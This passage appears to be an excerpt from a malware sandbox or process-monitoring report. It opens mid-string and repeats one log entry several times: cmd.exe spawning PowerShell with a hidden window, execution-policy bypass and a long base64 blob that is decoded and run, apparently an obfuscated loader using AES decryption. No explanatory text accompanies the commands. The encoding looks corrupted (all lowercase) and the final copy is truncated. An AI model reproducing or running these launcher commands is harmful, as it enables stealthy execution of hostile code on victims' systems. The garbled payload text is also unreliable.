k7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmfylcrwyxjhbtjfdmfykxsjsuvyicckehvweno9w1n5c3rlbs5squjdzufcq2zsqujdzwn0qujdaw9bqknulkfcq0f
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dhj5e2llecaokgllecaokcd3yndoagjyam5rcwvucgvpd2j3aghicmpua3flbnbld3did2hoynjqbmtxzw5wzxj3yndoagjyam5rcwvucgugd2j3aghicmpua3flbnbllxdid2hoynjqbmtxzw5wzvv3yndoagjyam5rcwvucgvzd2j3aghicmpua3flbnblzxdid2hoynjqbmtxzw5wzuj3yndoagjyam5rcwvucgvhd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvjd2j3aghicmpua3flbnbluhdid2hoynjqbmtxzw5wzwf3yndoagjyam5rcwvucgvyd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzwl3yndoagjyam5rcwvucgvud2j3aghicmpua3flbnblz3did2hoynjqbmtxzw5wzsaid2j3aghicmpua3flbnblahdid2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucgv0d2j3aghicmpua3flbnblchdid2hoynjqbmtxzw5wzxn3yndoagjyam5rcwvucgu6d2j3aghicmpua3flbnbll3did2hoynjqbmtxzw5wzs93yndoagjyam5rcwvucguwd2j3aghicmpua3flbnblehdid2hoynjqbmtxzw5wztb3yndoagjyam5rcwvucguud2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wzxr3yndoagjyam5rcwvucguvd2j3aghicmpua3flbnblohdid2hoynjqbmtxzw5wzut3yndoagjyam5rcwvucgv1d2j3aghicmpua3flbnblvndid2hoynjqbmtxzw5wzs53yndoagjyam5rcwvucgvwd2j3aghicmpua3flbnblc3did2hoynjqbmtxzw5wztf3yndoagjyam5rcwvucguijykuumvwbgfjzsgnd2j3aghicmpua3flbnbljywnjykpks5db250zw50ksatrxjyb3jby3rpb24gu2lszw50bhldb250aw51zx1jyxrjaht9o2z1bmn0aw9uihb0amtzkcrwyxjhbv92yxipewkkywvzx3zhcj1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5bzxndojpdcmvhdguoktsjjgflc192yxiutw9kzt1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5daxbozxjnb2rlxto6q0jdowkkywvzx3zhci5qywrkaw5npvttexn0zw0uu2vjdxjpdhkuq3j5chrvz3jhcgh5llbhzgrpbmdnb2rlxto6uetduzc7csrhzxnfdmfylktlet1bu3lzdgvtlknvbnzlcnrdojooj2duaxj0uzq2zxnhqm1vckynwy0xli4tmtzdic1qb2luiccnksgntglyauhybmtldevdz3neafdzzfc2z3fzwm41chhwakuzuxrolznnqjizyz0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6kcdnbmlydfm0nmvzyujtb3jgj1stms4ulte2xsatam9pbianjykoj3ird1fpui9qyudmzwntvk8voglrdfe9pscpowkkzgvjcnlwdg9yx3zhcj0kywvzx3zhci5dcmvhdgvezwnyexb0b3ioktsjjhjldhvybl92yxi9jgrly3j5chrvcl92yxiuvhjhbnnmb3jtrmluywxcbg9jaygkcgfyyw1fdmfylcawlcakcgfyyw1fdmfylkxlbmd0ack7csrkzwnyexb0b3jfdmfylkrpc3bvc2uoktsjjgflc192yxiurglzcg9zzsgpowkkcmv0dxjux3zhcjt9znvuy3rpb24gb2zldgeojhbhcmftx3zhcil7culfwcanjgpocnvupu5ldy1pymply3qgu3lzdgvtlklplk1bqknlbufcq29yqujdevnbqkn0ckfcq2vhqujdbsgsjhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgpidxjppu5ldy1pymply3qgu3lzdgvtlklplkfcq01bqknlqujdbufcq29bqknyqujdeufcq1nbqkn0qujdckfcq2vbqknhqujdbufcqzsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckz2l5b2g9tmv3lu9iamvjdcbtexn0zw0usu8uq0fcq29tqujdchjbqknlqujdc3nbqknpb0fcq24uqujdr1pbqknpcefcq1n0qujdcmvbqknhbufcqygkamhydw4siftjty5dqujdb21bqknwckfcq2vzqujdc2lbqknvbkfcqy5db0fcq21wqujdcmvbqknzc0fcq2lbqknvqujdbkfcq01vzgvdojpequjdzufcq2nbqknvbxbbqknyzufcq3nzktsnlljlcgxhy2uoj0fcqycsiccnktsjjgdpew9olknvchlubygkamj1cmkpowkkz2l5b2gurglzcg9zzsgpowkkamhydw4urglzcg9zzsgpowkkamj1cmkurglzcg9zzsgpowkkamj1cmkuvg9bcnjhesgpo31mdw5jdglvbibsahl4csgkcgfyyw1fdmf